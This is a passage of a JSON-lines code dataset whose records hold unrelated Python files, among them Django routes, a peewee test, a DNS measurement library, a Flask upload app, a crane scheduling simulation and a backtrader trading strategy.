res\n","sub_path":"codificador.py","file_name":"codificador.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"616455068","text":"\nfrom django.urls import path\n\n\nfrom account.views import *\n\nurlpatterns = [\n path('register/', RegisterUser.as_view(), name='register'),\n path('login/', LoginUser.as_view(), name='login'),\n path('logout/', logout_user, name='logout'),\n path('profile/', Profile.as_view(), name='profile'),\n\n]\n\n","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"224805270","text":"'''Integrated testing of the basic_operations module'''\r\n\r\n# pylint disabled: C0413, E0401\r\n\r\nfrom unittest import TestCase\r\nimport sys\r\nimport peewee\r\n\r\nsys.path.insert(1, '../')\r\nfrom customer_model import DATABASE, Customer\r\nimport basic_operations\r\n\r\nDATABASE.drop_tables([Customer])\r\nDATABASE.create_tables([Customer])\r\n\r\nclass TestBasicOperations(TestCase):\r\n '''Testing basic_operations functioanlity'''\r\n def test_integration(self):\r\n '''Integrated test set'''\r\n cust_list = [(101, 'Bugs', 'Bunny', '123 NE 160th Ave, Kirkland, WA 98034', '425-123-4567',\r\n 'bugs_bunny@gmail.com', 'Active', 100.00),\r\n (123, 'Donald', 'Duck', '456 SE 45th St, Bellevue, WA 98004', '425-234-5678',\r\n 'donald_duck@gmail.com', 'Active', 500.00),\r\n (53, 'Elmer', 'Fudd', '789 W 52nd Pl, Bothell, WA 98077', '425-345-6789',\r\n 'elmer_fudd@gmail.com', 'Inactive', 12000.00)]\r\n\r\n test_dict = {'f_name': 'Bugs', 'l_name': 'Bunny', 'email': 'bugs_bunny@gmail.com',\r\n 'phone': '425-123-4567'}\r\n\r\n # Test adding customers\r\n basic_operations.add_customer(*cust_list[0])\r\n basic_operations.add_customer(*cust_list[1])\r\n basic_operations.add_customer(*cust_list[2])\r\n\r\n cust_0 = Customer.get(Customer.cust_id == 101)\r\n cust_1 = Customer.get(Customer.cust_id == 123)\r\n cust_2 = Customer.get(Customer.cust_id == 53)\r\n\r\n # Verify customers were added\r\n try:\r\n self.assertEqual(cust_0.f_name, cust_list[0][1])\r\n self.assertEqual(cust_1.f_name, cust_list[1][1])\r\n 
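# (Editor's note) decodifica() above rebuilds nearest-integer rounding by hand with
# intTeto/intBase; math.floor(res + 0.5) implements the same rule, including the
# round-half-up tie behaviour (a sketch, name illustrative):
import math

def nearest_int(res):
    return math.floor(res + 0.5)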
self.assertEqual(cust_2.f_name, cust_list[2][1])\r\n except peewee.IntegrityError:\r\n assert False\r\n\r\n # Verify duplicate customers are not added\r\n try:\r\n with self.assertRaises(ValueError):\r\n basic_operations.add_customer(*cust_list[2])\r\n except peewee.IntegrityError:\r\n assert False\r\n\r\n # Verify able to search and find a customer\r\n self.assertEqual(basic_operations.search_customer(101), test_dict)\r\n\r\n # Verify searching for a non-existant customer is empty\r\n self.assertEqual(basic_operations.search_customer(3), {})\r\n\r\n # Verify able to update customer credit limit\r\n try:\r\n basic_operations.update_customer_credit(123, 100000)\r\n cust_1 = Customer.get(Customer.cust_id == 123)\r\n self.assertEqual(cust_1.credit, 100000)\r\n except peewee.IntegrityError:\r\n assert False\r\n\r\n # Verify customer credit limit cannot be updated for non-customer\r\n with self.assertRaises(ValueError):\r\n basic_operations.update_customer_credit(42, 1000)\r\n\r\n # Verify active customers are counted\r\n self.assertEqual(basic_operations.list_active_customers(), 2)\r\n\r\n # Verify a customer can be deleted\r\n try:\r\n basic_operations.delete_customer(53)\r\n self.assertEqual(cust_0.f_name, cust_list[0][1])\r\n self.assertEqual(cust_1.f_name, cust_list[1][1])\r\n try:\r\n Customer.get(Customer.cust_id == 53)\r\n assert False\r\n except peewee.DoesNotExist:\r\n assert True\r\n except peewee.IntegrityError:\r\n assert False\r\n\r\n # Verify a non-customer cannot be deleted\r\n with self.assertRaises(ValueError):\r\n basic_operations.delete_customer(55)\r\n","sub_path":"students/allen_maxwell/Lesson_03/tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"627148906","text":"import pandas as pd\r\nimport numpy as np\r\nimport pickle\r\nfrom translate import Translator\r\nimport joblib\r\nimport jieba\r\n\r\n\r\ndef is_ch(ch):\r\n if '\\u4e00' <= ch <= '\\u9fff':\r\n return True\r\n return False\r\n\r\n\r\ndef remove_pun(txt):\r\n new_txt = ''\r\n for char in txt:\r\n if is_ch(char):\r\n new_txt += char\r\n return new_txt\r\n\r\n\r\ndef str2vec(str1, str2):\r\n str1_set = set(str1)\r\n str2_set = set(str2)\r\n union = str1_set | str2_set\r\n vec1 = []\r\n vec2 = []\r\n for char in union:\r\n if char in str1_set:\r\n vec1.append(1)\r\n else:\r\n vec1.append(0)\r\n if char in str2_set:\r\n vec2.append(1)\r\n else:\r\n vec2.append(0)\r\n return np.array(vec1), np.array(vec2)\r\n\r\n\r\ndef cosine_similarity(x, y):\r\n num = x.dot(y.T)\r\n denom = np.linalg.norm(x) * np.linalg.norm(y)\r\n return num / denom\r\n\r\n\r\ndef get_feature_names(path):\r\n with open(path, 'rb') as f:\r\n feature_names = pickle.load(f)\r\n return feature_names\r\n\r\n\r\ndef get_target_names(path):\r\n with open(path, 'rb') as f:\r\n target_names = pickle.load(f)\r\n return target_names\r\n\r\n\r\ndef get_x(symptom, feature_names):\r\n x = [0] * len(feature_names)\r\n for s in symptom:\r\n sim = np.array(list(map(lambda x: cosine_similarity(*str2vec(s, x)), feature_names)))\r\n if sim.max() > 0:\r\n x[sim.argmax()] = 1\r\n return np.array(x)\r\n\r\n\r\ndef get_model(path):\r\n return joblib.load(path)\r\n\r\n\r\nfeature_names = get_feature_names('feature_names.pkl')\r\ntarget_names = get_target_names('target_names.pkl')\r\nclf = get_model('rf.pkl')\r\n\r\n\r\ndef get_disease(symptom):\r\n symptom = remove_pun(symptom)\r\n symptom = jieba.cut(symptom, 
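# (Editor's note) For the 0/1 membership vectors that str2vec above builds over the
# union of characters, cosine similarity reduces to |A intersect B| / sqrt(|A| * |B|)
# on the two character sets (the Otsuka-Ochiai coefficient), so the vectors
# themselves are unnecessary (a sketch, name illustrative):
import math

def char_set_similarity(s1, s2):
    a, b = set(s1), set(s2)
    if not a or not b:
        return 0.0
    return len(a & b) / math.sqrt(len(a) * len(b))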
cut_all=False)\r\n symptom = [s for s in symptom]\r\n x = get_x(symptom, feature_names).reshape(1, -1)\r\n translator = Translator(to_lang=\"chinese\")\r\n disease = translator.translate(target_names[clf.predict(x)[0]])\r\n return disease\r\n","sub_path":"2 老年人的远程智能诊疗/基于随机森林的医疗初诊系统 - 吃个面包压压惊/diagnosis.py","file_name":"diagnosis.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653090506","text":"from base64 import b64encode\nimport dns.rdatatype\nimport dns.message\nimport dns.resolver\nimport logging\nimport select\nimport socket\nimport threading\nimport time\n\n\ndef get_ips(host, nameserver=None, record=\"A\"):\n nameservers = []\n if nameserver is not None:\n nameservers = [nameserver]\n return lookup_domain(host, nameservers=nameservers, rtype=record)\n\n\ndef lookup_domain(domain, nameservers=[], rtype=\"A\", timeout=2):\n \"\"\"Wrapper for DNSQuery method\"\"\"\n dns_exp = DNSQuery(domains=[domain], nameservers=nameservers, rtype=rtype,\n timeout=timeout)\n return dns_exp.lookup_domain(domain)\n\n\ndef lookup_domains(domains, nameservers=[], rtype=\"A\", timeout=10):\n dns_exp = DNSQuery(domains=domains, nameservers=nameservers, rtype=rtype,\n timeout=timeout)\n return dns_exp.lookup_domains()\n\n\ndef send_chaos_queries():\n dns_exp = DNSQuery()\n return dns_exp.send_chaos_queries()\n\n\nclass DNSQuery():\n \"\"\"Class to store state for all of the DNS queries\"\"\"\n\n def __init__(self, domains=[], nameservers=[], rtype=\"A\", timeout=10,\n max_threads=100):\n \"\"\"Constructor for the DNS query class\n\n Params:\n nameserver- the nameserver to use, defaults to the local resolver\n rtype- the record type to lookup (as text), by default A\n timeout- how long to wait for a response, by default 10 seconds\n\n \"\"\"\n self.domains = domains\n self.rtype = rtype\n self.timeout = timeout\n self.max_threads = max_threads\n if nameservers == []:\n nameservers = dns.resolver.Resolver().nameservers\n self.nameservers = nameservers\n self.results = {}\n self.threads = []\n\n def send_chaos_queries(self):\n \"\"\"Send chaos queries to identify the DNS server and its manufacturer\n\n Note: we send 2 queries for BIND stuff per RFC 4892 and 1\n query per RFC 6304\n\n Note: we are not waiting on a second response because we\n shouldn't be getting injected packets here\n\n \"\"\"\n names = [\"HOSTNAME.BIND\", \"VERSION.BIND\", \"ID.SERVER\"]\n self.results = {'exp-name': \"chaos-queries\"}\n for name in names:\n self.results[name] = {}\n for nameserver in self.nameservers:\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.settimeout(self.timeout)\n query = dns.message.make_query(name,\n dns.rdatatype.from_text(\"TXT\"),\n dns.rdataclass.from_text(\"CH\"))\n sock.sendto(query.to_wire(), (nameserver, 53))\n reads, _, _ = select.select([sock], [], [], self.timeout)\n if reads == []:\n self.results[name][nameserver] = None\n else:\n response = reads[0].recvfrom(4096)[0]\n self.results[name][nameserver] = b64encode(response)\n return self.results\n\n def lookup_domains(self):\n \"\"\"More complex DNS primitive that lookups domains concurrently\n\n Note: if you want to lookup multiple domains, you should use\n this function\n \"\"\"\n thread_error = False\n thread_wait_timeout = 200\n ind = 1\n total_item_count = len(self.domains)\n for domain in self.domains:\n for nameserver in self.nameservers:\n wait_time = 0\n while 
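# [editor's sketch] send_chaos_queries above hand-rolls the UDP send/receive.
# With dnspython the same CHAOS-class TXT query (RFC 4892 / RFC 6304) can be
# issued via dns.query.udp; the server address below is a placeholder from the
# RFC 5737 documentation range, not a real resolver:
import dns.message
import dns.rdatatype
import dns.rdataclass   # note: the module above uses dns.rdataclass without
                        # importing it explicitly -- that happens to work because
                        # dns.message pulls it in, but an explicit import is safer
import dns.query

q = dns.message.make_query("version.bind", dns.rdatatype.TXT, dns.rdataclass.CH)
resp = dns.query.udp(q, "192.0.2.53", timeout=2)
for rrset in resp.answer:
    print(rrset.to_text())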
threading.active_count() > self.max_threads:\n time.sleep(1)\n wait_time += 1\n if wait_time > thread_wait_timeout:\n thread_error = True\n break\n\n if thread_error:\n self.results[\"error\"] = \"Threads took too long to finish.\"\n break\n log_prefix = \"%d/%d: \" % (ind, total_item_count)\n thread = threading.Thread(target=self.lookup_domain,\n args=(domain, nameserver,\n log_prefix))\n thread.setDaemon(1)\n thread.start()\n self.threads.append(thread)\n if thread_error:\n break\n ind += 1\n\n for thread in self.threads:\n thread.join(self.timeout * 3)\n return self.results\n\n def lookup_domain(self, domain, nameserver=None, log_prefix = ''):\n \"\"\"Most basic DNS primitive that lookups a domain, waits for a\n second response, then returns all of the results\n\n Params:\n domain- the domain to lookup\n nameserver- the nameserver to use\n\n Note: if you want to lookup multiple domains you *should not* use\n this function, you should use lookup_domains because this does\n blocking IO to wait for the second response\n\n \"\"\"\n # get the resolver to use\n if nameserver is None:\n nameserver = self.nameservers[0]\n results = {'domain': domain, 'nameserver': nameserver}\n # construct the socket to use\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.settimeout(self.timeout)\n\n logging.debug(\"%sQuerying DNS enteries for \"\n \"%s (nameserver: %s).\" % (log_prefix, domain, nameserver))\n\n # construct and send the request\n request = dns.message.make_query(domain,\n dns.rdatatype.from_text(self.rtype))\n results['request'] = b64encode(request.to_wire())\n sock.sendto(request.to_wire(), (nameserver, 53))\n\n # read the first response from the socket\n reads, _, _ = select.select([sock], [], [], self.timeout)\n # if we didn't get anything, then set the results to nothing\n if reads == []:\n results['response1'] = None\n self.results[domain] = results\n return results\n response = reads[0].recvfrom(4096)[0]\n results['response1'] = b64encode(response)\n resp = dns.message.from_wire(response)\n results['response1-ips'] = self.parse_out_ips(resp)\n\n # if we have made it this far, then wait for the next response\n reads, _, _ = select.select([sock], [], [], self.timeout)\n # if we didn't get anything, then set the results to nothing\n if reads == []:\n results['response2'] = None\n self.results[domain] = results\n return results\n response = reads[0].recvfrom(4096)[0]\n results['response2'] = b64encode(response)\n resp = dns.message.from_wire(response)\n results['response2-ips'] = self.parse_out_ips(resp)\n self.results[domain] = results\n return results\n\n def parse_out_ips(self, message):\n \"\"\"Given a message, parse out the ips in the answer\"\"\"\n\n ips = []\n for entry in message.answer:\n for rdata in entry.items:\n ips.append(rdata.to_text())\n return ips\n","sub_path":"centinel/primitives/dnslib.py","file_name":"dnslib.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"6675562","text":"from flask import Flask, render_template, request\nimport re\nimport json\nimport csv\nimport sqlite3\nfrom werkzeug.utils import secure_filename\nfrom ravisample import endview\napp = Flask(__name__)\n\n\n\n@app.route('/')\ndef upload_file():\n return render_template('upload.html')\n\n\n\n@app.route('/uploader', methods=['GET', 'POST'])\ndef upload_fil():\n if request.method == 'POST':\n u = request.form['name']\n f = 
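# [editor's sketch] lookup_domains above caps concurrency by polling
# threading.active_count() and sleeping. A ThreadPoolExecutor expresses the
# same bound declaratively; lookup_fn stands in for DNSQuery.lookup_domain
# (this is an alternative pattern, not the module's own API):
from concurrent.futures import ThreadPoolExecutor, as_completed

def lookup_all(lookup_fn, domains, nameservers, max_workers=100):
    results = {}
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        futures = {pool.submit(lookup_fn, d, ns): d
                   for d in domains for ns in nameservers}
        for fut in as_completed(futures):
            results[futures[fut]] = fut.result()
    return results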
request.files['file']\n f.save(secure_filename(f.filename))\n s = f.filename\n st = str(s)\n cl=endview()\n if st.endswith(\".csv\"):\n return cl.csvf(f,u)\n\n elif st.endswith(\".json\"):\n return cl.jsonf(f,u)\n\n elif st.endswith(\".txt\"):\n return cl.txtf(f,u)\n else:\n return \"NO\"\n\n\n\n@app.route('/count',methods=['GET', 'POST'])\ndef count():#NUMBER OF PASSWORDS IN A USER TABLE\n if request.method == 'POST':\n u = request.form['name']\n k=endview()\n r=k.Npassword(u)\n return \"Number of Duplicate users is {}\".format(str(r))\n\n\n\n@app.route('/noft',methods=['GET', 'POST'])\ndef noft():#NUMBER OF TABLES IN DATABASE\n vl=endview()\n k=vl.NTables()\n return \"NUMBER OF TABLES IN DATABASE IS {}\".format(str(k))\n\n\n\n@app.route('/dp',methods=['GET','POST'])\ndef dp():#DUPLICATE USERS ACROSS ALL TABLES IN A DATABASE\n u=request.form['name']\n rr=endview()\n k=rr.DuplicateUsers(u)\n return \"Number of Duplicate Users Accross all Tables in DATABASE is {}\".format(str(k))\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"fileupload.py","file_name":"fileupload.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"634134545","text":"# Module: RTG.py\r\n# class rtg -> RTG and methods for executing commands assigned to RTG\r\n#\r\n# Laixian Wan\r\n# wanlx@bu.edu\r\n\r\nfrom enum import Enum\r\nfrom RTGCommand import cmdStatus\r\n\r\nclass rtgStatus(Enum):\r\n STOP = -1\r\n IDLE = 0\r\n WORKING = 1\r\n\r\nclass rtg:\r\n def __init__(self, position, ID):\r\n self.ID = ID\r\n self.cmd = None\r\n self.endPos = self.pos = position\r\n self.stat = rtgStatus.IDLE\r\n self.notAvailableUntil = -1\r\n self.cmdPool = [] \r\n self.ttlDistance = 0\r\n self.ttlServiceTime = 0\r\n\r\n def addToPool(self, CMD, left, right, blockObj):\r\n '''\r\n adds assigned commends to rtg's own command pool.\r\n returns a bool value to indicate if rtg accepts assigned works.\r\n '''\r\n if self.stat != rtgStatus.IDLE or CMD == []:\r\n return False \r\n else: \r\n #self.cmdPool = sorted(CMD, key = lambda x: x.bay.bayNum.value, reverse = True)\r\n self.cmdPool = [cmd for cmd in CMD if cmd.bay.bayNum.value > left and cmd.bay.bayNum.value < right]\r\n if abs(self.pos.bayNum.value - CMD[0].bay.bayNum.value) < abs(self.pos.bayNum.value - CMD[-1].bay.bayNum.value):\r\n self.cmdPool.reverse()\r\n for cmd in self.cmdPool:\r\n blockObj.pendingCMD.remove(cmd)\r\n self.endPos = CMD[0].bay\r\n self.stat = rtgStatus.WORKING\r\n return True\r\n\r\n def runRTG(self, blockObj, T):\r\n '''\r\n checks status of rtg and decide if it can move on to the next command\r\n in its commands pool.\r\n '''\r\n if self.stat != rtgStatus.WORKING:\r\n return\r\n if T >= self.notAvailableUntil:\r\n if self.cmd is not None:\r\n self.cmd.status = cmdStatus.FINISHED\r\n self.cmd.finishTime = T\r\n self.cmd.clean(blockObj, T)\r\n blockObj.finishedCMD.append(self.cmd)\r\n self.cmd = None\r\n # try to avoid this implementation in real time simulation.\r\n # this is a very costly way to check if a previous assigned\r\n # command is done. 
Try to adopt event-based programming and let\r\n # rtg object raises an event whenever a command is done.\r\n self.executeNxtCmd(T)\r\n \r\n def executeNxtCmd(self, T):\r\n '''\r\n executes a command from rtg's command pool.\r\n '''\r\n if not self.cmdPool:\r\n self.stat = rtgStatus.IDLE\r\n else:\r\n nxtCmd = self.cmdPool.pop()\r\n # updating rtg's properties\r\n self.cmd = nxtCmd\r\n d, t = self.travelTime(self.cmd.bay)\r\n self.notAvailableUntil = T + t + self.cmd.workload\r\n self.ttlServiceTime += t + self.cmd.workload\r\n self.ttlDistance += d\r\n self.pos = self.cmd.bay # important. Might reuse the fact that rtg has access to all\r\n # commands on a certain bay to decide if it can actually wait\r\n # and execute extra commands that are not in its cmdPool\r\n\r\n # updating cmd's properties\r\n self.cmd.updateWaitingTime\r\n self.cmd.startTime = T\r\n self.cmd.status = cmdStatus.PROCESSING\r\n self.cmd.assignToRtg = self.ID\r\n return\r\n\r\n def releaseCmd(self, blockObj):\r\n '''\r\n releases commands from RTG's own command pool.\r\n '''\r\n if self.stat != rtgStatus.WORKING:\r\n return\r\n else:\r\n for cmd in self.cmdPool:\r\n blockObj.pendingCMD.add(cmd)\r\n self.cmdPool = []\r\n\r\n def travelTime(self, bay):\r\n '''\r\n calculates how long the rtg would travel and\r\n how much time would cost for rtg to move from its current\r\n position to a certain bay position, in minute.\r\n '''\r\n distance = abs(self.pos.bayNum.value - bay.bayNum.value)\r\n return (distance, distance * 2)\r\n \r\n def __str__(self):\r\n return \"RTG ID: \" + str(self.ID) + \"\\nProcessing: \" + str(self.cmd)\r\n","sub_path":"RTG.py","file_name":"RTG.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"590266461","text":"#\n# @lc app=leetcode id=9 lang=python3\n#\n# [9] Palindrome Number\n#\n\n# @lc code=start\n\n#This is just a part of qn5\nclass Solution:\n def isPalindrome(self, x: int) -> bool:\n s = str(x)\n l = len(s)\n for i in range(int(l/2)):\n if s[i] != s[l-i-1]:\n return False\n return True\n# @lc code=end\n\n","sub_path":"python3/9.palindrome-number.py","file_name":"9.palindrome-number.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"396089359","text":"import csv\nimport urllib.request\nimport requests\n\nfrom flask import redirect, render_template, request, session, url_for\nfrom functools import wraps\n\nSUPPORTED_TYPES = [\"book\", \"movie\", \"series\", \"song\"]\nALLOWED_FILE_EXTENSIONS = set(['xls', 'xlsx', 'xlsm', 'xltx', 'xltm'])\n\n# https://stackoverflow.com/questions/2336522/png-vs-gif-vs-jpeg-vs-svg-when-best-to-use\nALLOWED_POSTER_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'svg'])\nSUPPORTED_LANGUAGES = [\n 'afrikanns', 'albanian', 'arabic', 'armenian', 'basque', 'bengali',\n 'bulgarian', 'catalan', 'cambodian', 'chinese', 'croation', 'czech',\n 'danish', 'dutch', 'english', 'estonian', 'fiji', 'finnish', 'french',\n 'georgian', 'german', 'greek', 'gujarati', 'hebrew', 'hindi',\n 'hungarian', 'icelandic', 'indonesian', 'irish', 'italian', 'japanese',\n 'javanese', 'korean', 'latin', 'latvian', 'lithuanian', 'macedonian',\n 'malay', 'malayalam', 'maltese', 'maori', 'marathi', 'mongolian', 'nepali',\n 'norwegian', 'persian', 'polish', 'portuguese', 'punjabi', 'quechua',\n 'romanian', 'russian', 'samoan', 'serbian', 'slovak', 'slovenian',\n 'spanish', 'swahili', 'swedish', 'tamil', 'tatar', 
'telugu', 'thai',\n 'tibetan', 'tonga', 'turkish', 'ukranian', 'urdu', 'uzbek', 'vietnamese',\n 'welsh', 'xhosa'\n ]\n\n# ensure selected file allowed\n# extension must present and allowed\ndef forbidden_file(filename):\n return '.' not in filename or \\\n filename.rsplit('.', 1)[1].lower() not in ALLOWED_FILE_EXTENSIONS\n\n# ensure poster url exists and it points to an image of an allowed format\n# https://stackoverflow.com/questions/16778435/python-check-if-website-exists\n# https://stackoverflow.com/questions/16511337/correct-way-to-try-except-using-python-requests-module/16511493\ndef forbidden_poster(poster_url):\n\n try:\n request = requests.get(poster_url)\n except requests.exceptions.MissingSchema:\n return True\n\n if request.status_code not in range(200,400):\n return True\n\n if '.' not in poster_url or \\\n poster_url.rsplit('.', 1)[1].lower() not in ALLOWED_POSTER_EXTENSIONS:\n return True\n\n return False\n\ndef apology(error_message=\"\", error_cause=\"\"):\n \"\"\"Renders message as an apology to user.\"\"\"\n\n return render_template(\"apology.html\", error_message=error_message, error_cause=error_cause)\n\ndef success(success_message=\"\"):\n \"\"\"Renders message as a confirmation of a successful action.\"\"\"\n\n return render_template(\"success.html\", success_message=success_message)\n\ndef login_required(f):\n \"\"\"\n Decorate routes to require login.\n\n http://flask.pocoo.org/docs/0.11/patterns/viewdecorators/\n \"\"\"\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if \"user_id\" not in session:\n return redirect(url_for(\"log_in\", next=request.url))\n return f(*args, **kwargs)\n return decorated_function\n\n# convert list of objects into list of dictionaries\ndef dict_conversion(objs):\n dicts = []\n for obj in objs:\n dicts.append(obj.asdict())\n return dicts","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418838985","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('members', '0013_overseasstudent_visitor'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='overseasstudent',\n name='title',\n field=models.CharField(default='\\u76f4\\u535a\\u751f', max_length=100, verbose_name='\\u5b66\\u751f\\u7c7b\\u522b', choices=[('\\u76f4\\u535a\\u751f', '\\u76f4\\u535a\\u751f'), ('\\u7855\\u535a\\u8fde\\u8bfb', '\\u7855\\u535a\\u8fde\\u8bfb'), ('\\u7855\\u58eb\\u751f', '\\u7855\\u58eb\\u751f')]),\n ),\n migrations.AddField(\n model_name='visitor',\n name='title',\n field=models.CharField(default='\\u6b63\\u6559\\u6388', max_length=100, verbose_name='\\u5bfc\\u5e08\\u804c\\u79f0', choices=[('\\u6b63\\u6559\\u6388', '\\u6b63\\u6559\\u6388'), ('\\u526f\\u6559\\u6388', '\\u526f\\u6559\\u6388'), ('\\u535a\\u58eb\\u540e', '\\u535a\\u58eb\\u540e')]),\n ),\n ]\n","sub_path":"ccms/apps/members/migrations/0014_auto_20160305_1617.py","file_name":"0014_auto_20160305_1617.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"487165341","text":"from __future__ import (absolute_import, division,\n print_function, unicode_literals)\n\nimport datetime # For datetime objects\nimport os.path # To manage paths\nimport sys # To find out the script name (in argv[0])\n\n# Import the backtrader 
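# [editor's sketch] Typical use of the login_required decorator defined in
# helpers.py above: it wraps a Flask view and bounces anonymous visitors to
# the login page. The route and view name here are hypothetical:
from flask import Flask

app = Flask(__name__)

@app.route("/profile")
@login_required           # innermost, so the session check runs on each request
def profile():
    return "only visible when 'user_id' is in the session"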
platform\nimport backtrader as bt\nimport backtrader.feeds as btfeeds\n\nimport pandas as pd\nimport streamlit as st\n\n# Create a Stratey\n\nclass TestStrategy(bt.Strategy):\n params = (('p1', 8), \n ('p2', 20),\n ('p3', 144),\n ('rsi', 40),\n ('rr', 4),\n ('rrp', 1),\n ('candleper', 0.005),\n ('delay', -1),\n ('pricelimitper', 0.001),\n ('bodyper', 0.7),\n )\n \n\n def log(self, txt, dt=None):\n ''' Logging function fot this strategy'''\n dt = dt or self.datas[0].datetime.date(0)\n #print('%s, %s' % (dt.isoformat(), txt))\n print('%s,%s, %s' % (dt.strftime(\"%d/%m/%Y\"),self.datas[0].datetime.time().strftime(\"%H:%M:%S\") ,txt))\n st.sidebar.write('%s,%s, %s' % (dt.strftime(\"%d/%m/%Y\"),self.datas[0].datetime.time().strftime(\"%H:%M:%S\") ,txt))\n\n def __init__(self):\n # Keep a reference to the \"close\" line in the data[0] dataseries\n self.dataclose = self.datas[0].close\n self.dataopen = self.datas[0].open\n self.datalow = self.datas[0].low\n self.datahigh = self.datas[0].high\n \n\n # To keep track of pending orders and buy price/commission\n self.order = None\n self.buyprice = None\n self.buycomm = None\n self.sl = 1\n self.reward = 0\n \n\n # Add a MovingAverageSimple indicator\n self.ema1 = bt.indicators.EMA(period=self.p.p1)\n self.ema2 = bt.indicators.EMA(period=self.p.p2)\n self.sma3 = bt.indicators.SMA(period=self.p.p3)\n \n self.rsi = bt.indicators.RSI(self.datas[0],plothlines=[55, 45])\n #self.vwap = bt.indicators.VWAP(self.datas[0])\n\n def notify_order(self, order):\n if order.status in [order.Submitted, order.Accepted]:\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n return\n\n # Check if an order has been completed\n # Attention: broker could reject order if not enough cash\n if order.status in [order.Completed]:\n if order.isbuy():\n self.log(\n 'BUY EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f, candle_pos = %.2f,' %\n (order.executed.price,\n order.executed.value,\n order.executed.comm,\n len(self)))\n\n self.buyprice = order.executed.price\n self.buycomm = order.executed.comm\n else: # Sell\n self.log('SELL EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f candle_pos =%.2f,' %\n (order.executed.price,\n order.executed.value,\n order.executed.comm,\n len(self)))\n\n self.bar_executed = len(self)\n\n elif order.status in [order.Canceled, order.Margin, order.Rejected]:\n self.log('Order Canceled/Margin/Rejected')\n\n self.order = None\n\n def notify_trade(self, trade):\n if not trade.isclosed:\n return\n\n self.log('OPERATION PROFIT, GROSS %.2f, NET %.2f \\n \\n' %\n (trade.pnl, trade.pnlcomm))\n \n\n\n def next(self):\n # Simply log the closing price of the series from the reference\n #self.log('Close, %.2f' % self.dataclose[0])\n # Check if time is greater 9 30 or not\n \n if (self.data.datetime.time() < datetime.time(9,30) ) or (self.data.datetime.time() > datetime.time(15,10)) :\n return \n\n # Check if an order is pending ... if yes, we cannot send a 2nd one\n if self.order:\n return\n \n\n # Check if we are in the market\n if self.position.size == 0:\n \n # Not yet ... we MIGHT BUY if ... 
self.datas[0].close\n c0 = (self.dataclose[self.p.delay -2] > self.dataopen[self.p.delay-2]) #prev prev cadle green \n c1 = (self.dataclose[self.p.delay] > self.dataopen[self.p.delay]) # current candle green \n c2 = (self.dataclose[self.p.delay -1] > self.dataopen[self.p.delay-1]) #prev cadle red \n \n c3 = self.ema2[self.p.delay] > self.sma3[self.p.delay] ##20EMA > 144SMA\n \n c4 = abs(self.dataclose[self.p.delay] - self.ema2[self.p.delay] ) / self.ema2[self.p.delay] < 0.5/100 # (close - 20em )<0.5%\n c5 = ((self.datahigh[self.p.delay]-self.datalow[self.p.delay]) < self.p.candleper * self.dataclose[self.p.delay]) # hi-low < 0.5% of close\n \n c6 = self.dataclose[self.p.delay] > self.datahigh[self.p.delay -1] #crurrent close > prev high \n c7 = ( self.datahigh[self.p.delay-1] - self.datalow[self.p.delay-1] ) < ( self.datahigh[self.p.delay-2] - self.datalow[self.p.delay-2] ) # prev candle len shorter than prev prev candle len \n c8 = self.ema2[self.p.delay] > self.ema2[self.p.delay -1] and self.ema2[self.p.delay-1] > self.ema2[self.p.delay -2] #\n if (c0 & c1 & c2 & c3 & c4 & c5 & c6 & c7 & c8 ):\n ##diff = self.dataclose[0] - self.dataclose[lastred]\n rr = self.p.rr\n \n\n cash = self.stats.broker.cash[self.p.delay]\n maxRisk = cash * 0.01\n\n self.sl = 0.999* self.datalow[self.p.delay - 1] # SL: prev candle low - 0.1%\n diff = self.datalow[self.p.delay ] - self.sl\n self.reward = rr*diff+self.dataclose[self.p.delay]\n self.bsize = int(min(maxRisk/diff , cash/self.dataclose[self.p.delay]))\n # BUY, BUY, BUY!!! (with all possible default parameters)\n bprice = self.data.close[self.p.delay] * (1+self.p.pricelimitper)\n self.log(\" Buy Signal at candle_pos = \"+str(len(self))+ \" Buy limit at \"+ str(bprice))\n\n \n\n # Keep track of the created order to avoid a 2nd order\n #self.order = self.buy(size=self.bsize)\n \n self.order = self.buy(exectype=bt.Order.Stop,\n size=self.bsize,price=bprice,\n valid=datetime.datetime.now() + datetime.timedelta(minutes=30)\n )\n\n self.log('BUY CREATE, %.2f' % 